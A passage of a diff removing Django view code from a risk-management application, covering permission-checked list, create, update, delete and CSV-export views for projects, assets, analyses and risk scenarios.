security_function__name__icontains=query)).filter(id__in=object_ids_view)[:10] - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - ra_list = Analysis.objects.filter(Q(name__icontains=query) | Q(project__name__icontains=query) | Q( - project__folder__name__icontains=query) | Q(version__icontains=query)).filter(id__in=object_ids_view)[:10] - return {"Analysis": ra_list, "RiskScenario": ri_list, "SecurityMeasure": mtg_list} - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - self.request.user, "view_user") - context['exceeded_users'] = (MAX_USERS - User.objects.all().count()) < 0 - return context - - -class Browser(ListView): - context_object_name = 'context' - template_name = 'core/browser.html' - - map_rsk = {'0': "open", '1': "mitigated", - '2': "accepted", '3': "blocker", '4': "transferred"} - map_mtg = {'0': "open", '1': "in_progress", '2': "on_hold", '3': "done"} - - def get_queryset(self): - rsk = self.request.GET.get('rsk') - mtg = self.request.GET.get('mtg') - if rsk: - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - return {"type": _("risk scenarios"), "filter": self.map_rsk[rsk], "items": RiskScenario.objects.filter(treatment=self.map_rsk[rsk]).filter(id__in=object_ids_view)} - if mtg: - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityMeasure) - return {"type": _("security measures"), "filter": self.map_mtg[mtg], "items": SecurityMeasure.objects.filter(status=self.map_mtg[mtg]).filter(id__in=object_ids_view)} - - def get_context_data(self, **kwargs: Any): - context = super().get_context_data(**kwargs) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - self.request.user, "view_user") - return context - - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - self.request.user, "view_user") - context['exceeded_users'] = (MAX_USERS - User.objects.all().count()) < 0 - return context - - -@login_required -def global_overview(request): - template = 'core/overview.html' - - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, SecurityMeasure) - - viewable_analyses = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, Analysis)[0] - - _ord_security_measures = SecurityMeasure.objects.filter(id__in=object_ids_view).exclude(status='done').order_by('eta') - - context = { - "counters": get_counters(request.user), - "risks_level": risks_count_per_level(request.user), - "security_measure_status": security_measure_per_status(request.user), - "measures_to_review": measures_to_review(request.user), - "acceptances_to_review": acceptances_to_review(request.user), - "today": date.today(), - "agg_data": risk_status(request.user, Analysis.objects.filter(id__in=viewable_analyses)), - "ord_security_measures": sorted(_ord_security_measures, key=lambda mtg: mtg.get_ranking_score(), reverse=True), - "analyses": Analysis.objects.filter(id__in=viewable_analyses).order_by('created_at'), - "colors": get_risk_color_ordered_list(request.user), - "viewable_measures": object_ids_view, - "updatable_measures": object_ids_change, - "view_user": RoleAssignment.has_permission(request.user, "view_user"), # NOTE: Need to factorize with BaseContextMixin - "exceeded_users": (MAX_USERS - User.objects.all().count()) < 0, - "change_usergroup": RoleAssignment.is_access_allowed(user=request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()), - } - - return render(request, template, context) - - -def compile_analysis_for_composer(user: User, analysis_list: list): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, Analysis) - - rc = risks_count_per_level(user, analysis_list) - current_level = rc['current'] - residual_level = rc['residual'] - - untreated = RiskScenario.objects.filter(analysis__in=analysis_list).exclude( - treatment__in=['mitigated', 'accepted']) - untreated_h_vh = RiskScenario.objects.filter(analysis__in=analysis_list).exclude( - treatment__in=['mitigated', 'accepted']).filter(current_level__gte=2) - accepted = RiskScenario.objects.filter( - analysis__in=analysis_list).filter(treatment='accepted') - - values = list() - labels = list() - color_map = {"open": "#93c5fd", "in_progress": "#fdba74", - "on_hold": "#f87171", "done": "#86efac"} - for st in SecurityMeasure.MITIGATION_STATUS: - count = SecurityMeasure.objects.filter(status=st[0]).filter( - riskscenario__analysis__in=analysis_list).count() - v = { - "value": count, - "itemStyle": {"color": color_map[st[0]]} - } - values.append(v) - labels.append(st[1]) - - analysis_objects = list() - - for _ra in analysis_list: - synth_table = list() - _rc = risks_count_per_level(user=user, analyses=[_ra]) - length = len(_rc['current']) - for i in range(length): - count_c = _rc['current'][i]['value'] - count_r = _rc['residual'][i]['value'] - lvl = _rc['current'][i]['name'] - color = _rc['current'][i]['color'] - synth_table.append( - {"lvl": lvl, "current": count_c, "residual": count_r, "color": color}) - hvh_risks = RiskScenario.objects.filter( - analysis__id=_ra).filter(current_level__gte=2) - analysis_objects.append( - {"analysis": get_object_or_404( - Analysis, pk=_ra), "synth_table": synth_table, "hvh_risks": hvh_risks} - ) - - return { - "analysis_objects": analysis_objects, - "current_level": current_level, - "residual_level": residual_level, - "view_user": RoleAssignment.has_permission(user, "view_user"), # NOTE: Need to factorize with BaseContextMixin - "exceeded_users": (MAX_USERS - User.objects.all().count()) < 0, - "change_usergroup": RoleAssignment.is_access_allowed(user=user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()), - "counters": {"untreated": untreated.count(), "untreated_h_vh": untreated_h_vh.count(), "accepted": accepted.count()}, - "riskscenarios": {"untreated": untreated, "untreated_h_vh": untreated_h_vh, "accepted": accepted}, - "security_measure_status": {"labels": labels, "values": values}, - "colors": get_risk_color_ordered_list(user, analysis_list), - } - - -class ComposerListView(ListView): - - def get(self, request, *args, **kwargs): - v = request.GET.get('analysis') - if v: - request_list = request.GET.getlist('analysis')[0] - data = [item for item in request_list.split(',')] - # debug print(f"got {len(data)} analysis in {data}") - context = { - "context": compile_analysis_for_composer(self.request.user, data), - "view_user": RoleAssignment.has_permission(request.user, "view_user"), # NOTE: Need to factorize with BaseContextMixin - "exceeded_users": (MAX_USERS - User.objects.all().count()) < 0, - "change_usergroup": RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()), - } - return render(request, 'core/composer.html', context) - else: - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - context = {'context': Analysis.objects.filter( - id__in=object_ids_view)} - return render(request, 'core/project_select.html', context) - - -def index(request): - return HttpResponse("Hello, world. You're at the core index.") - - -def export_risks_csv(request, analysis): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, Analysis) - if UUID(analysis) in object_ids_view: - ra = get_object_or_404(Analysis, pk=analysis) - - response = HttpResponse(content_type='text/csv') - response['Content-Disposition'] = f'attachment; filename="RA-{ra.id}-{ra.project}-v-{ra.version}.csv"' - - writer = csv.writer(response, delimiter=';') - columns = ['rid', 'threat', 'name', 'scenario', - 'existing_measures', 'current_level', 'measures', 'residual_level', - 'treatment'] - writer.writerow(columns) - - for ri in ra.riskscenario_set.all().order_by('created_at'): - security_measures = '' - for mtg in ri.security_measures.all(): - security_measures += f"[{mtg.status}]{mtg.name} \n" - row = [ri.rid, ri.threat, ri.name, ri.description, - ri.existing_measures, ri.get_current_risk()['name'], - security_measures, ri.get_residual_risk()[ - 'name'], ri.treatment, - ] - writer.writerow(row) - - return response - else: - raise PermissionDenied() - - -def export_mp_csv(request, analysis): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, Analysis) - if UUID(analysis) in object_ids_view: - ra = get_object_or_404(Analysis, pk=analysis) - - response = HttpResponse(content_type='text/csv') - response['Content-Disposition'] = f'attachment; filename="MP-{ra.id}-{ra.project}-v-{ra.version}.csv"' - - writer = csv.writer(response, delimiter=';') - columns = ['risk_scenario', - 'measure_id', 'measure_name', 'measure_desc', 'type', 'security_function', 'eta', 'effort', 'link', 'status', - ] - writer.writerow(columns) - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), request.user, SecurityMeasure) - for mtg in SecurityMeasure.objects.filter(id__in=object_ids_view).filter(riskscenario__analysis=analysis): - risk_scenarios = [] - for rs in mtg.riskscenario_set.all(): - risk_scenarios.append(str(rs.rid) + ": " + rs.name) - row = [risk_scenarios, - mtg.id, mtg.name, mtg.description, mtg.type, mtg.security_function, mtg.eta, mtg.effort, mtg.link, mtg.status, - ] - writer.writerow(row) - - return response - else: - raise PermissionDenied() - - -def scoring_assistant(request): - template = 'core/scoring.html' - context = {} - context['matrices'] = list( - RiskMatrix.objects.all().values_list('json_definition', flat=True)) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - request.user, "view_user") - context['exceeded_users'] = (MAX_USERS - User.objects.all().count()) < 0 - return render(request, template, context) - - -def show_risk_matrix(request): - template = 'core/risk_matrix.html' - context = {} - return render(request, template, context) - - -class ReviewView(BaseContextMixin, ListView): - template_name = 'core/review.html' - context_object_name = 'context' - model = Analysis - ordering = 'id' - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - return context - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - return Analysis.objects.filter(id__in=object_ids_view) - - -class CreateViewModal(BaseContextMixin, CreateView): - template_name: str = 'core/fallback_form.html' - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - url_name = self.model.__name__.lower() - if self.model.__name__.lower() == "folder": - plural_name = _("Projects domains") - name = "projects domain" - elif self.model.__name__.lower() == "securityfunction": - plural_name = _("Security functions") - name = "security function" - else: - plural_name = self.model._meta.verbose_name_plural - name = self.model.__name__.replace('Risk', 'Risk ').lower() - context["cancel_url"] = reverse_lazy(f'{url_name}-list') - context["crumbs"] = {url_name + "-list": plural_name} - context["object_type"] = _("Add" + " " + name) - return context - - def get_success_url(self): - return self.request.POST.get('next', reverse_lazy(f'{self.model.__name__.lower()}-list')) - - -class QuickStartView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/quick_start.html' - context_object_name = 'quick-start' - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['projects_domain_create_form'] = FolderUpdateForm - context['project_create_form'] = ProjectForm - context['analysis_create_form'] = RiskAnalysisCreateForm - context['riskscenario_create_form'] = RiskScenarioCreateForm - context['securitymeasure_create_form'] = SecurityMeasureCreateForm - context['threat_create_form'] = ThreatCreateForm - context['security_function_create_form'] = SecurityFunctionCreateForm - context['asset_create_form'] = AssetForm(user=self.request.user) - return context - - def get_queryset(self): - return True - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class ProjectListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/project_list.html' - context_object_name = 'projects' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = Project - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Project) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = ProjectFilter(self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = ProjectFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['project_create_form'] = ProjectForm(user=self.request.user) - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Project) - context['add_project'] = RoleAssignment.has_permission( - self.request.user, 'add_project') - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class ProjectCreateView(UserPassesTestMixin, CreateView): - model = Project - template_name = 'core/project_create.html' - context_object_name = 'project' - form_class = ProjectForm - - def get_success_url(self) -> str: - return reverse_lazy('project-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename='add_project'), folder=Folder.objects.get(id=self.request.POST['folder'])) - - -class ProjectCreateViewModal(CreateViewModal, UserPassesTestMixin): - model = Project - context_object_name = 'project' - form_class = ProjectForm - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_project"), folder=Folder.objects.get(id=self.request.POST['folder'])) - - -class ProjectUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = Project - template_name = 'core/project_update.html' - context_object_name = 'project' - form_class = ProjectForm - - def get_form_kwargs(self): - # Récupérer les arguments à passer à la classe de formulaire - kwargs = super().get_form_kwargs() - kwargs['user'] = self.request.user - return kwargs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['analyses'] = Analysis.objects.filter( - project=self.get_object()).order_by('is_draft', 'id') - context['analysis_create_form'] = RiskAnalysisCreateFormInherited( - initial={'project': get_object_or_404(Project, id=self.kwargs['pk']), 'auditor': self.request.user}) - context['crumbs'] = {'project-list': _('Projects')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('project-list') - else: - return self.request.POST.get('next', '/') - - def form_valid(self, form): - folder = form.cleaned_data['folder'] - if not RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename='change_project'), folder=folder): - raise PermissionDenied() - return super().form_valid(form) - - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename='change_project'), folder=self.get_object().folder) - - -class ProjectDeleteView(UserPassesTestMixin, DeleteView): - model = Project - success_url = reverse_lazy('project-list') - template_name = 'snippets/project_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('project-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_project"), folder=self.get_object().folder) - - -class AssetListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/asset_list.html' - context_object_name = 'assets' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = Asset - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Asset) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = AssetFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = AssetFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['asset_create_form'] = AssetForm(user=self.request.user) - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Asset) - context['add_asset'] = RoleAssignment.has_permission( - self.request.user, 'add_asset') - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class AssetCreateView(UserPassesTestMixin, CreateView): - model = Asset - template = 'snippets/asset_create.html' - context_object_name = 'asset' - form_class = AssetForm - - def get_success_url(self): - return reverse_lazy('asset-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_asset"), folder=Folder.get_root_folder()) - - -class AssetCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = Asset - context_object_name = 'asset' - form_class = AssetForm - - def get_form_kwargs(self): - kwargs = super().get_form_kwargs() - kwargs['user'] = self.request.user - return kwargs - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_asset"), folder=Folder.get_root_folder()) - - -class AssetUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = Asset - context_object_name = 'asset' - form_class = AssetForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['crumbs'] = {'asset-list': _('Assets')} - return context - - def get_form_kwargs(self): - kwargs = super().get_form_kwargs() - kwargs['user'] = self.request.user - return kwargs - - def get_success_url(self) -> str: - return reverse_lazy('asset-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_asset"), folder=self.get_object().folder) - - -class AssetDeleteView(UserPassesTestMixin, DeleteView): - model = Asset - success_url = reverse_lazy('asset-list') - template_name = 'snippets/asset_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('asset-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_asset"), folder=self.get_object().folder) - - -class FolderListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/project_domain_list.html' - context_object_name = 'domains' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = Folder - - def get_queryset(self): - folders_list = RoleAssignment.get_accessible_folders( - Folder.get_root_folder(), self.request.user, Folder.ContentType.DOMAIN, codename="view_folder") - qs = self.model.objects.filter(id__in=folders_list) - filtered_list = ProjectsDomainFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = ProjectsDomainFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['projects_domain_create_form'] = FolderUpdateForm - context['add_folder'] = RoleAssignment.has_permission( - self.request.user, 'add_folder') - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Folder) - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class FolderCreateView(UserPassesTestMixin, CreateView): - model = Folder - template_name = 'core/pd_update.html' - context_object_name = 'domain' - form_class = FolderUpdateForm - - def get_success_url(self) -> str: - return reverse_lazy('folder-list') - - def test_func(self): - # TODO: Change this when we allow picking a folder for role assignments - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_folder"), folder=Folder.get_root_folder()) - - -class FolderCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = Folder - context_object_name = 'domain' - form_class = FolderUpdateForm - - def get_success_url(self) -> str: - folder = self.object - auditors = UserGroup.objects.create( - name=UserGroupCodename.AUDITOR, folder=folder, builtin=True) - validators = UserGroup.objects.create( - name=UserGroupCodename.VALIDATOR, folder=folder, builtin=True) - analysts = UserGroup.objects.create( - name=UserGroupCodename.ANALYST, folder=folder, builtin=True) - managers = UserGroup.objects.create( - name=UserGroupCodename.DOMAIN_MANAGER, folder=folder, builtin=True) - ra1 = RoleAssignment.objects.create(user_group=auditors, role=Role.objects.get( - name=RoleCodename.AUDITOR), builtin=True, folder=Folder.get_root_folder()) - ra1.perimeter_folders.add(folder) - ra2 = RoleAssignment.objects.create(user_group=validators, role=Role.objects.get( - name=RoleCodename.VALIDATOR), builtin=True, folder=Folder.get_root_folder()) - ra2.perimeter_folders.add(folder) - ra3 = RoleAssignment.objects.create(user_group=analysts, role=Role.objects.get( - name=RoleCodename.ANALYST), builtin=True, folder=Folder.get_root_folder()) - ra3.perimeter_folders.add(folder) - ra4 = RoleAssignment.objects.create(user_group=managers, role=Role.objects.get( - name=RoleCodename.DOMAIN_MANAGER), builtin=True, folder=Folder.get_root_folder()) - ra4.perimeter_folders.add(folder) - messages.info(self.request, _( - 'User groups {} - Auditors, {} - Validators, {} - Analysts and {} - Domain Managers were created').format(folder.name, folder.name, folder.name, folder.name)) - return self.request.POST.get('next', reverse_lazy('folder-list')) - - def test_func(self): - # TODO: Change this when we allow picking a folder for role assignments - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_folder"), folder=Folder.get_root_folder()) - - -class FolderUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = Folder - template_name = 'core/pd_update.html' - context_object_name = 'domain' - form_class = FolderUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['projects'] = Project.objects.filter(folder=self.get_object()) - context['crumbs'] = {'folder-list': _('Projects domains')} - context['project_create_form'] = ProjectFormInherited( - initial={'folder': get_object_or_404(Folder, id=self.kwargs['pk'])}) - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('folder-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_folder"), folder=self.get_object()) - - -class FolderDeleteView(UserPassesTestMixin, DeleteView): - model = Folder - success_url = reverse_lazy('folder-list') - template_name = 'snippets/projects_domain_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('folder-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_folder"), folder=self.get_object()) - - -class RiskAnalysisListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/analysis_list.html' - context_object_name = 'analyses' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = Analysis - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = AnalysisFilter( - self.request.GET, request=self.request, queryset=qs) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = AnalysisFilter(self.request.GET, queryset=queryset, request=self.request) - context['filter'] = filter - # self.model._meta.verbose_name # TODO: Find a way to get unlocalized model verbose_name, as localization may break stuff e.g. urls - context['model'] = 'analysis' - context['analysis_create_form'] = RiskAnalysisCreateForm - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Analysis) - context['add_analysis'] = RoleAssignment.has_permission( - self.request.user, 'add_analysis') - context['no_matrix'] = (RiskMatrix.objects.all().count() - RiskMatrix.objects.filter(is_enabled=False).count()) < 1 - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class RiskAnalysisCreateView(UserPassesTestMixin, CreateView): - model = Analysis - template_name = 'core/ra_create.html' - context_object_name = 'analysis' - form_class = RiskAnalysisCreateForm - - def get_success_url(self) -> str: - return self.request.POST.get('next', '/') - - def test_func(self): - project = Project.objects.get(id=self.request.POST['project']) - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_analysis"), folder=Folder.objects.get(id=project.folder.id)) - - -class RiskAnalysisCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = Analysis - context_object_name = 'analysis' - form_class = RiskAnalysisCreateForm - - def get_success_url(self) -> str: - return self.request.POST.get('next', 'analysis-list') - - def test_func(self): - project = Project.objects.get(id=self.request.POST['project']) - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_analysis"), folder=Folder.objects.get(id=project.folder.id)) - - -class RiskAnalysisUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = Analysis - template_name = 'core/ra_update.html' - context_object_name = 'analysis' - form_class = RiskAnalysisUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['risk_scenario_create_form'] = RiskScenarioCreateForm( - initial={'analysis': get_object_or_404(Analysis, id=self.kwargs['pk'])}) - context['scenarios'] = RiskScenario.objects.filter( - analysis=self.get_object()).order_by('created_at') - context['crumbs'] = {'analysis-list': _('Analyses')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('analysis-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed( - user=self.request.user, - perm=Permission.objects.get(codename="change_analysis"), - folder=Folder.get_folder(self.get_object())) - - -class RiskMatrixDeleteView(UserPassesTestMixin, DeleteView): - model = RiskMatrix - success_url = reverse_lazy('riskmatrix-list') - template_name = 'snippets/rm_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('riskmatrix-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_riskmatrix"), folder=self.get_object().folder) - - -class RiskAnalysisDeleteView(UserPassesTestMixin, DeleteView): - model = Analysis - success_url = reverse_lazy('analysis-list') - template_name = 'snippets/ra_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('analysis-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_analysis"), folder=self.get_object().project.folder) - - -class RiskScenarioListView(BaseContextMixin, UserPassesTestMixin, ListView): - permission_required = 'core.view_riskscenario' - template_name = 'core/ri_list.html' - context_object_name = 'scenarios' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = RiskScenario - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = RiskScenarioFilter(self.request.GET, request=self.request, queryset=qs) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = RiskScenarioFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['model'] = 'riskscenario' - context['risk_scenario_create_form'] = RiskScenarioCreateForm - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskScenario) - context['add_riskscenario'] = RoleAssignment.has_permission( - self.request.user, 'add_riskscenario') - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class RiskScenarioCreateView(BaseContextMixin, UserPassesTestMixin, CreateView): - model = RiskScenario - template_name = 'core/ri_create.html' - context_object_name = 'scenario' - form_class = RiskScenarioCreateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['analysis'] = get_object_or_404( - Analysis, id=self.kwargs['analysis']) - - return context - - def form_valid(self, form: RiskScenarioCreateForm) -> HttpResponse: - if form.is_valid(): - form.scenario.analysis = get_object_or_404( - Analysis, id=self.kwargs['analysis']) - return super().form_valid(form) - - def get_success_url(self) -> str: - return reverse('analysis-update', kwargs={'pk': get_object_or_404(Analysis, id=self.kwargs['analysis']).id}) - - def test_func(self): - analysis = get_object_or_404(Analysis, id=self.request.POST['analysis']) - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_riskscenario"), folder=Folder.objects.get(id=analysis.project.folder.id)) - - -class RiskScenarioCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = RiskScenario - context_object_name = 'scenario' - form_class = RiskScenarioCreateForm - - def test_func(self): - analysis = get_object_or_404(Analysis, id=self.request.POST['analysis']) - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_riskscenario"), folder=Folder.objects.get(id=analysis.project.folder.id)) - - -class RiskScenarioUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = RiskScenario - template_name = 'core/ri_update.html' - context_object_name = 'scenario' - form_class = RiskScenarioUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['security_measures'] = self.get_object().security_measures.all() - context['existing_security_measures'] = SecurityMeasure.objects.filter( - folder=self.get_object().analysis.project.folder) - context['crumbs'] = {'riskscenario-list': _('Risk scenarios')} - context['measure_create_form'] = SecurityMeasureCreateFormInherited( - initial={'folder': get_object_or_404(Folder, id=self.get_object().analysis.project.folder.id)}) - context['measures_select_form'] = SecurityMeasureSelectForm( - initial={ - 'security_measures': self.get_object().security_measures.all()}, - ) - context['measures_select_form'].fields['security_measures'].queryset = SecurityMeasure.objects.filter( - folder=self.get_object().parent_project().folder) - - context['matrix'] = self.get_object().get_matrix() - return context - - def form_valid(self, form): - response = super().form_valid(form) - if 'security_measure_name' in self.request.POST and SecurityMeasure.objects.filter(name=self.request.POST['security_measure_name'], folder=self.get_object().analysis.project.folder).exists(): - self.get_object().security_measures.add(SecurityMeasure.objects.get(name=self.request.POST['security_measure_name'], folder=self.get_object().analysis.project.folder)) - return response - - def get_success_url(self) -> str: - if "select_measures" in self.request.POST: - return reverse_lazy('riskscenario-update', kwargs={'pk': self.kwargs['pk']}) - else: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('riskscenario-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_riskscenario"), folder=self.get_object().analysis.project.folder) - - -class RiskScenarioUpdateViewModal(UserPassesTestMixin, UpdateView): - model = RiskScenario - template_name = 'core/ri_update_modal.html' - context_object_name = 'scenario' - form_class = SecurityMeasureSelectForm - - def get_success_url(self) -> str: - return reverse_lazy('riskscenario-update', kwargs={'pk': self.kwargs['pk']}) - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_riskscenario"), folder=self.get_object().analysis.project.folder) - - -class RiskScenarioDeleteView(UserPassesTestMixin, DeleteView): - model = RiskScenario - success_url = 